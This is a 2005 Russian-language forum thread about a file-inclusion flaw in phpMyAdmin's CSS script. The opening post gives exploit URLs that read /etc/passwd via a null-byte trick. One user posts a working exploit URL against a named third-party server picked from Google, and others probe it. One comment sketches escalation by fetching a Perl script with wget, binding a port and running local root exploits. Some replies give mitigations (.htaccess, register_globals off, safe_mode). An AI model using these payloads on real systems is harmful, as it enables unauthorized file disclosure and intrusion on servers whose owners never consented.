LINUX.ORG.RU
 
Sun-ch

Серьезная уязвимость phpMyAdmin


0

0

Удаленное включение файлов.
Например:
http://[HOST]/[DIR]/css/phpmyadmin.css.p hp?GLOBALS[cfg][ThemePath]=/etc/passwd%0 0&theme=passwd%00
http://[HOST]/[DIR]/css/phpmyadmin.css.p hp?GLOBALS[cfg][ThemePath]=/etc&them e=passwd%00

>>> Подробности

# ()
Проверено: Pi (25.02.2005 18:58:44)

[#]  

Re: Серьезная уязвимость phpMyAdmin

http://[HOST]/[DIR]/css/phpmyadmin.css.pрp?GLOBALS[cfg][ThemePath]=/etc/passwd

Это чтоже, можно получается любую переменную в GLOBALS переписать? Офигеть!

anonymous ()
[#]  

Разве это серьезная уязвимость?

Разве это серьезная уязвимость?
Те кто ставят/позволяют ставить phpMyAdmin позволяют и доступ к локальным файлам.

anonymous ()
[#] Ответ на: Разве это серьезная уязвимость? от anonymous 25.02.2005 19:05:14  

Re: Разве это серьезная уязвимость?

> Те кто ставят/позволяют ставить phpMyAdmin позволяют и доступ к локальным файлам.

Да, и не только.

anonymous ()
[#]  
knoppix

Re: Серьезная уязвимость phpMyAdmin

А у меня что-то не получается получить хотя-бы /etc/passwd вышеописанным способом. Выдает все время css текст и никаких намеков на включение файлов. Версия phpAdmin'a 2.5.1, проверял под IE.

()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от delta9 25.02.2005 20:37:57  
atrus

Re: Серьезная уязвимость phpMyAdmin

И у меня ни фига. phpMyAdmin 2.5.6. Но там написано, что нужен 2.6.1. Наверное, этот баг в наших версиях не поддерживается... ;-)

***** ()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от atrus 25.02.2005 21:30:59  

Re: Серьезная уязвимость phpMyAdmin

а если у меня доступ к phpadmin закрыт htaccess'ом ?

anonymous ()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от anonymous 25.02.2005 21:36:26  
n1tro

Re: Серьезная уязвимость phpMyAdmin

>> а если у меня доступ к phpadmin закрыт htaccess'ом ?

Тогда, соответственно, у тебя все в порядке.


А для тех, кто не верит, что уязвимость есть, вот пример:
http://www.anotherlight.com/phpmyadmin/css/phpmyadmin.css.php?GLOBALS[cfg][Theme Path]=/proc/cpuinfo%00&theme=y0%20ls%20-la%00

(первый попавшийся сервак из гугля)

* ()
[#]  

Re: Серьезная уязвимость phpMyAdmin

Ссаныч стал script-kiddie?

# ()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от n1tro 25.02.2005 21:54:16  

Re: Серьезная уязвимость phpMyAdmin

Хм, только здесь и сейчас я прочитал, что phpMyAdmin можно выставить в интернет (сам бы никогда не догадался :) -- век живу, век учусь.

***** ()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от Lumi 25.02.2005 23:53:16  

Re: Серьезная уязвимость phpMyAdmin

да ладно вые**ваться - полно в инете серваков в phpMyAdmin. Смотри дальше своего носа дружок. Все с понтом крутаны ха ха ;)

# ()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от n1tro 25.02.2005 21:54:16  
atrus

Re: Серьезная уязвимость phpMyAdmin

> А для тех, кто не верит, что уязвимость есть, вот пример

И? Насколько я понимаю, он должен был выдать мне информацию о процессоре? Но я вижу только css'ку... ;-P

***** ()
[#]  
unReal

Re: Серьезная уязвимость phpMyAdmin

Во первых: .htaccess, именно он а не стандартная приблуда авторизации phpMyAdmin'а

Во вторых: register_globals нахер офф

В третьих: safe_mode

и всё пучком ;)

* ()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от mky 26.02.2005 2:58:08  
JB

Re: Серьезная уязвимость phpMyAdmin

а команды как нибудь можно выполнять? у меня получается только файлы просматривать

***** ()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от soko1 26.02.2005 7:05:23  

Re: Серьезная уязвимость phpMyAdmin

Да нет, сейчас робит.. вы бы это хоть написали подопытному, какой уязвисости он подвержен..

()
[#]  

Re: Серьезная уязвимость phpMyAdmin

Скажите а кто этот phpMyAdmin использует и для чего ? В упор не понимаю на кой он нужен !

anonymous ()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от Nik33 26.02.2005 8:19:18  

Re: Серьезная уязвимость phpMyAdmin

>Да нет, сейчас робит.. вы бы это хоть написали подопытному, какой >уязвисости он подвержен..
С другой стороны тот-же /etc/shadow он не показывает те запущен не от рута, тогда что плохого могут сделать ? Максимум сайт задефейсить систему все равно не порушат. Вообщем это к необходимости иметь бекап и вовремя обновлятся.

anonymous ()
[#]  

Re: Серьезная уязвимость phpMyAdmin

хотя если поискать наверняка можно найти кого-то у кого из под рута оно пущено...

anonymous ()
[#]  

Re: Серьезная уязвимость phpMyAdmin

Ну... у него и ядро 2.4.21, не следят за обновлениями.

anonymous ()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от anonymous 26.02.2005 9:23:04  

Re: Серьезная уязвимость phpMyAdmin

В октябре 2003 годя последний раз ядро обновляли.

anonymous ()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от anonymous 26.02.2005 9:03:41  
dsx

Re: Серьезная уязвимость phpMyAdmin

>Скажите а кто этот phpMyAdmin использует и для чего ? В упор не понимаю на кой он нужен !

Чтобы клиент, отдавший свои кровные 10.95$ мог получить доступ к MySQL-базам в привычном ему виде -- через браузер. Интересно, CPanel скоро эту дрянь обновит или полезней будет превентивно пропатчить самостоятельно?..

()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от dsx 26.02.2005 9:32:24  

Re: Серьезная уязвимость phpMyAdmin

>Чтобы клиент, отдавший свои кровные 10.95$ мог получить доступ к >MySQL-базам в привычном ему виде -- через браузер.
Те для хостингов получается. А шелл обычно такие ребята дают ? Я лучше уж через mysql консоль поработаю :) Удаленно-то база надеюсь не доступна :)

anonymous ()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от anonymous 26.02.2005 9:11:57  

Re: Серьезная уязвимость phpMyAdmin

>> С другой стороны тот-же /etc/shadow он не показывает те запущен не >> от рута, тогда что плохого могут сделать ? Максимум сайт >> задефейсить систему все равно не порушат. Вообщем это к необходимости >> иметь бекап и вовремя обновлятся.

Погляди немного дальше свое носа и ты поймешь, что на твоем серваке кто-то ненпрягаясь сможет получить root ;) Оссобенно в свете в последнее время локальных уязвимостей в линуксе ;)

* ()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от BSDun 26.02.2005 9:55:28  

Re: Серьезная уязвимость phpMyAdmin

да, никто не мешает через wget закачать скрипт на перле, забиндить порт и использовать кучу local root эксплоитов ;)

вот тут и видна разница между linux и *bsd

*** ()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от BSDun 26.02.2005 9:55:28  

Re: Серьезная уязвимость phpMyAdmin

>твоем серваке кто-то ненпрягаясь сможет получить root ;)
На моем врядли, я в отличие от него постоянно обновляюсь.

anonymous ()
[#]  
theserg

Re: Серьезная уязвимость phpMyAdmin

не работает!

phpMyAdmin-2.5.6

*** ()
[#]  
Adjkru

Re: Серьезная уязвимость phpMyAdmin

надо проверить. сейчас проверю хотя бы на винде (денвер)

**** ()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от Adjkru 26.02.2005 12:17:32  
Adjkru

Re: Серьезная уязвимость phpMyAdmin

Работает phpMyadmin 2.6.1-rc2. apache 1.3.31/win32 php/4.3.10

сначала сделал echo hacked > z:/etc/passwd

дал запрос http://localhost/Tools/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath] =z:/etc/passwd%00&theme=passwd%00

- это вывело hacked, а ниже - css

**** ()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от x97Rang 26.02.2005 10:14:42  
n1tro

Re: Серьезная уязвимость phpMyAdmin

>> да, никто не мешает через wget закачать скрипт на перле, забиндить
>> порт и использовать кучу local root эксплоитов ;)

>> вот тут и видна разница между linux и *bsd

Да ты что ;)))))) Интересно, каким образом через эту уязвимость ты будешь использовать вгет?

* ()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от soko1 26.02.2005 7:05:23  
n1tro

Re: Серьезная уязвимость phpMyAdmin

Да и вообще, народ... кончайте мучать сервер :)))) я же ради примера привел :)

* ()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от n1tro 26.02.2005 12:45:58  
Adjkru

Re: Серьезная уязвимость phpMyAdmin

я один раз лазил в ядро freebsd, даже что-то менял 8). делал так чтобы запуская progra.exe запускался wine. ничего не получилось, да и есть такое уже где-то видел...

Вот если внутри ядра прописать выполение команды при открытии файла - тогда можно и похакать =)

**** ()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от Adjkru 26.02.2005 13:23:18  
n1tro

Re: Серьезная уязвимость phpMyAdmin

Не, ну вы меня поражаете :))) это какой же администратор будет у себя на сервере заниматься подобной хренью? :) Тогда сразу, чтобы атакующий особо не замарачивался, отключить использование shadow и все ;)

* ()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от mky 26.02.2005 2:58:08  
atrus

Re: Серьезная уязвимость phpMyAdmin

> Работает, нужно только в ThemePath убрать пробел.

Можешь не сомниваться - убирал.

***** ()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от n1tro 26.02.2005 14:14:26  
Adjkru

Re: Серьезная уязвимость phpMyAdmin

неа, лучше отключить хеши и перекомпилить что-то если сразу не поддается =)

**** ()
[#] Ответ на: Re: Серьезная уязвимость phpMyAdmin от Adjkru 26.02.2005 13:23:18  
borisych

Re: Skippy - пейджер во весь экран

>я один раз лазил в ядро freebsd, даже что-то менял 8). делал так чтобы запуская progra.exe запускался wine. ничего не получилось, да и есть такое уже где-то видел...

ага, binfmt_misc в linux :)

***** ()
Безопасность